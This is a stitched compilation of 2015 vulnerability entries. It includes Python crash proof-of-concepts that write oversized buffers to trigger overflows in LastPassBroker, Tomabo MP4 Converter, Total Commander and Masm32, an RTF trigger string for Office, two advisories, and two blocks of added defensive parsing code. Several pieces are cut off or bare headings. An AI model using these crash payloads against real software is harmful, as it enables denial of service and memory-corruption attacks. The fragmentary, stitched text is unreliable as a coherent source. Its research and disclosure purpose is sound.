GuardIran

********************************************************************************************

# Exploit Title: Last PassBroker Stack-based BOF

# Date: 9/23/2015

# Exploit Author: Un_N0n

# Software Link:

# Version: 3.2.16

# Tested on: Windows 7 x86(32 BIT)

********************************************************************************************

[Steps to Produce the Crash]:
1- Open 'LastPassBroker.exe'.
2- An input box will appear asking for Email and Password; in the password field, paste in the contents of crash.txt.
3- Hit Login.
~ Software will crash.

# Generates the password-field payload: 66666 'A' bytes written to CRASH.txt
junk = "A" * 66666

# The file is closed automatically when the with block exits
with open("CRASH.txt", "w") as file:
    file.write(junk)

> Vendor Notified, Fixed in latest Release.

**********************************************************************************************


OpenSource Security Ralf Spenneberg

Am Bahnhof 3-5

48565 Steinfurt

info@os-s.net

OS-S Security Advisory 2015-04

Date: October 7th, 2015

Last Updated: October 7th, 2015

Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg

CVE: not yet assigned

CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)

Title: Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid USB device descriptors (usbvision driver)

Severity: Critical. The Kernel panics. A reboot is required.

Vendor contacted: March 13th 2015

Ease of Exploitation: Trivial

Vulnerability type: Wrong input validation

Products: RHEL 7.1 including all updates

Abstract

The Kernel 3.10.0-123.20.1.el7.x86_64 crashes when presented with a buggy USB device which requires the usbvision driver. All subsequently published kernel updates crash as well.

Detailed product description

We confirmed the bug on the following system:

RHEL 7.1

kernel >= 3.10.0-123.20.1.el7.x86_64

Further products or kernel versions have not been tested.

Description

The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo (github.com/schumilo) using the following device descriptor:


Microsoft Office 2007 And 2010 RTF Frmtxtbrl EIP Corruption

The following crash was observed in MS Office 2007 running under Windows 2003 x86. Microsoft Office File Validation Add-In was disabled and Application Verifier was enabled for testing and reproduction. This sample also reproduced in Office 2010 running on Windows 7 x86. It did not reproduce in Microsoft Office 2013 running under Windows 8.1 x86.

To reproduce, place this string in a file with the extension .rtf and open it with MS Word 2007 or 2010.

{\rtf1{\pn\pnlvlbody\pndbnuml}\absw9\chatn\sect\frmtxtbrl\par}

DLL Versions:
wwlib.dll: 12.0.6726.5000
mso.dll: 12.0.6721.5000

Found by: scvitti
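Added example, not part of the original post: a small Python scanner that tokenizes RTF control words and flags a document carrying the combination seen in the trigger string above. The trigger set, the brace-balance check and the two sample inputs are assumptions; `\frmtxtbrl` is also a legitimate control word, so a hit marks a file for sandbox analysis rather than proving it malicious.

```python
import re

# Constructed samples: the trigger string quoted on the page and a benign RTF document
CRASH_SAMPLE = r"{\rtf1{\pn\pnlvlbody\pndbnuml}\absw9\chatn\sect\frmtxtbrl\par}"
BENIGN_SAMPLE = r"{\rtf1\ansi\deff0{\fonttbl{\f0 Arial;}}\pard Hello world.\par}"

# RTF control word: backslash, letters, optional signed integer parameter, optional delimiting space
CONTROL_WORD = re.compile(r"\\([A-Za-z]+)(-?\d+)? ?")

# Assumed heuristic (not from the post): the trigger combines an absolute-width frame (\absw),
# a section break (\sect) and \frmtxtbrl; a document carrying all three is flagged for sandboxing
TRIGGER_SET = {"absw", "sect", "frmtxtbrl"}

def control_words(rtf):
    """Return (word, parameter) tuples in document order; parameter is None when absent."""
    return [(m.group(1), int(m.group(2)) if m.group(2) is not None else None)
            for m in CONTROL_WORD.finditer(rtf)]

def group_depth_ok(rtf):
    """True if group braces are balanced; malformed nesting is a second, independent reason to flag."""
    depth, i = 0, 0
    while i < len(rtf):
        ch = rtf[i]
        if ch == "\\" and i + 1 < len(rtf) and rtf[i + 1] in "{}\\":
            i += 2  # escaped brace or backslash, not a group delimiter
            continue
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth < 0:
                return False
        i += 1
    return depth == 0

def scan(rtf):
    """Return a dict describing whether and why the document was flagged."""
    if not rtf.lstrip().startswith(r"{\rtf"):
        return {"rtf": False, "flagged": False, "hits": [], "balanced": None}
    present = {w for w, _ in control_words(rtf)}
    hits = sorted(TRIGGER_SET & present)
    balanced = group_depth_ok(rtf)
    return {"rtf": True, "flagged": TRIGGER_SET <= present or not balanced,
            "hits": hits, "balanced": balanced}
```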


#!/usr/bin/python
# Exploit Title: Tomabo MP4 Converter 3.10.12 - (.m3u) Denial of service (Crash application)
# Date: [8-10-2015]
# Exploit Author: [M.Ibrahim] vulnbug@gmail.com
# E-Mail: vulnbug <at> gmail.com
# Vendor Homepage:
# Version: [3.10.12]
# Tested on: windows 7 x86

# Oversized playlist entry: 600000 'A' bytes on a single line
junk = "A" * 600000

# Write the payload to exploit.m3u; opening it in the converter triggers the crash
file = "exploit.m3u"
with open(file, "w") as f:
    f.write(junk)


********************************************************************************************

# Exploit Title: Total Commander 32bit SEH Overwrite.

# Date: 8/27/2015

# Exploit Author: Un_N0n

# Software Vendor:

# Software Link:


# Version: 8.52

# Tested on: Windows 8 x64(64 BIT)

********************************************************************************************

[Info:]
EAX 00106541
ECX FFFFFEFA
EDX 0031E941
EBX 04921F64
ESP 001065FC
EBP 41414141
ESI 04930088
EDI 0031E9B0
EIP 41414141

SEH chain of main thread, item 0
Address=001065FC
SE handler=41414141

[Steps to Produce the Crash]:
1- Open up 'TOTALCMD.EXE'.
2- Go to Files -> Change Attributes.
3- In the time field, paste in the contents of 'Crash.txt'.
~ Software will crash b/c SEH Overwrite.

# Writes 5000 'A' bytes to crash.txt; pasting them into the time field produces the SEH overwrite above
with open("crash.txt", "w") as file:
    file.write("A" * 5000)

-> After reporting, Vendor has released a new version (bugfix release 8.52a, 9th Sept 2015).

**********************************************************************************************


# EXPLOIT TITLE: Masm32v11r Buffer Overflow(SEH overwrite) crash POC

# AUTHOR: VIKRAMADITYA "-OPTIMUS"

# Date of Testing: 22nd September 2015

# Download Link :

# Tested On : Windows 10

# Steps to Crash :-

# Step 1: Execute this python script

# Step 2: This script will create a file called MASM_crash.txt

# Step 3: Now open Masm32's QUICK EDITOR

# Step 4: Go to Script > 'Convert Text to Script'

# Step 5: Open the MASM_crash.txt to convert

# Step 6: That should crash the program .

# Payload: 4676 bytes of filler, two 4-byte markers ("B" and "C"), then 500 bytes of trailing data
buffer = "A" * 4676 + "B" * 4 + "C" * 4 + "D" * 500

# Write the payload to MASM_crash.txt; the file is closed when the with block exits
with open("MASM_crash.txt", "w") as file:
    file.write(buffer)

Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow



Onapsis Security Advisory 2015-013: SAP Business Objects Memory Corruption

1. Impact on Business

=====================

By exploiting this vulnerability an unauthenticated attacker could read or write any business-relevant information from the Business Intelligence Platform and also render the system unavailable to other users.

Risk Level: High

2. Advisory Information

=======================

* Public Release Date: 09/22/2015

* Last Revised: 09/22/2015

* Security Advisory ID: ONAPSIS-2015-013

* Onapsis SVS ID: ONAPSIS-00105

* CVE: N/A

* Researcher: Will Vandevanter

* Vendor Provided CVSS v2: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:C)

* Onapsis CVSS v2: 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C)

* Onapsis CVSS v3: 8.6 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H)

3. Vulnerability Information

============================

* Vendor: SAP AG

* Affected Components:
  * BusinessObjects Edge 4.0
  * BusinessObjects BI Platform 4.1
  * BOXI 3.1 R3

* Vulnerability Class: Buffer Copy without Checking Size of Input (CWE-120)

* Remotely Exploitable: Yes

* Locally Exploitable: No

* Authentication Required: No

* Original Advisory:

4. Affected Components Description

==================================

Business Objects is part of the Business Intelligence platform from SAP. It has components that provide performance management, planning, reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact with different platform services.

5. Vulnerability Details

========================

A mishandling of a malformed GIOP packet causes the remote listener to crash while reading from invalid memory.

6. Solution

===========

Implement SAP Security Note 2001108.

7. Report Timeline

==================

12/23/2013: Onapsis provides vulnerability information to SAP AG.

12/24/2013: SAP AG confirms reception of vulnerability report.

01/14/2014: SAP reports fix is In Process.

05/12/2015: SAP releases SAP Security Note 2001108 fixing the vulnerability.

09/22/2015: Onapsis Releases Security Advisory.

About Onapsis Research Labs

===========================

Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community.

About Onapsis, Inc.

===================

Onapsis gives organizations the adaptive advantage to succeed in securing business-critical applications by combining technology, research and analytics. Onapsis enables every security and compliance team an adaptive approach to focus on the factors that matter most to their business-critical applications that house vital data and run business processes including SAP Business Suite, SAP HANA and SAP Mobile deployments.
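Added example, not Onapsis or SAP code: a Python GIOP header parser that checks every declared length against the bytes actually received before slicing, which is the validation step that CWE-120 describes as missing. The 1 MiB policy limit and the sample packets produced by build_giop are assumptions.

```python
import struct

GIOP_MAGIC = b"GIOP"
GIOP_HEADER_LEN = 12
# Message types from the CORBA GIOP MsgType enumeration
MSG_TYPES = {0: "Request", 1: "Reply", 2: "CancelRequest", 3: "LocateRequest",
             4: "LocateReply", 5: "CloseConnection", 6: "MessageError", 7: "Fragment"}
# Assumed deployment policy (not from the advisory): refuse any message claiming more than 1 MiB
MAX_MESSAGE_SIZE = 1 << 20

class MalformedGIOP(ValueError):
    """Raised for any header field that fails validation."""

def parse_giop(data):
    """Validate a GIOP message and return ((major, minor), type name, body bytes).
    Every declared length is compared with the bytes actually received before
    anything is sliced, which is the check a CWE-120 style reader omits."""
    if len(data) < GIOP_HEADER_LEN:
        raise MalformedGIOP("short header: %d bytes" % len(data))
    magic, major, minor, flags, msg_type = struct.unpack_from("<4sBBBB", data, 0)
    if magic != GIOP_MAGIC:
        raise MalformedGIOP("bad magic %r" % magic)
    if major != 1 or minor > 2:
        raise MalformedGIOP("unsupported GIOP version %d.%d" % (major, minor))
    # GIOP 1.0 stores a byte_order boolean here; 1.1+ keeps it as bit 0 of the flags octet
    little_endian = bool(flags & 0x01)
    (msg_size,) = struct.unpack_from("<I" if little_endian else ">I", data, 8)
    if msg_type not in MSG_TYPES:
        raise MalformedGIOP("unknown message type %d" % msg_type)
    if msg_size > MAX_MESSAGE_SIZE:
        raise MalformedGIOP("declared size %d exceeds policy limit" % msg_size)
    body = data[GIOP_HEADER_LEN:]
    if len(body) < msg_size:
        raise MalformedGIOP("declared %d body bytes, received %d" % (msg_size, len(body)))
    return (major, minor), MSG_TYPES[msg_type], body[:msg_size]

def is_malformed(data):
    """True if parse_giop rejects data; handy for filtering and tests."""
    try:
        parse_giop(data)
        return False
    except MalformedGIOP:
        return True

def build_giop(msg_type, body, little_endian=True, minor=2):
    """Constructed sample-packet builder for exercising the parser (not a real client)."""
    fmt = "<4sBBBBI" if little_endian else ">4sBBBBI"
    return struct.pack(fmt, GIOP_MAGIC, 1, minor, int(little_endian), msg_type, len(body)) + body
```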
